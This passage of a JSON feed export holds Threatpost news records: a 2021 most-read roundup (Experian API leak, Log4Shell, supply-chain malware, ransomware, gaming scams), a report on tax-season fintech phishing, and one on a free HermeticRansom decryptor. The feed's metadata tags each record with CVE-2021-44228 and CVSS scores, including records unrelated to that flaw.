(gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 &amp; 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sites this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to[ a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. \u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals\n\nto encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure if an email is legitimate or not.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T16:58:20", "description": "A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.\n\nThe fact that there was ransomware clinging to the data-wiping malware didn\u2019t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a \u201cbroader intrusion chain.\u201d\n\n> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. <https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 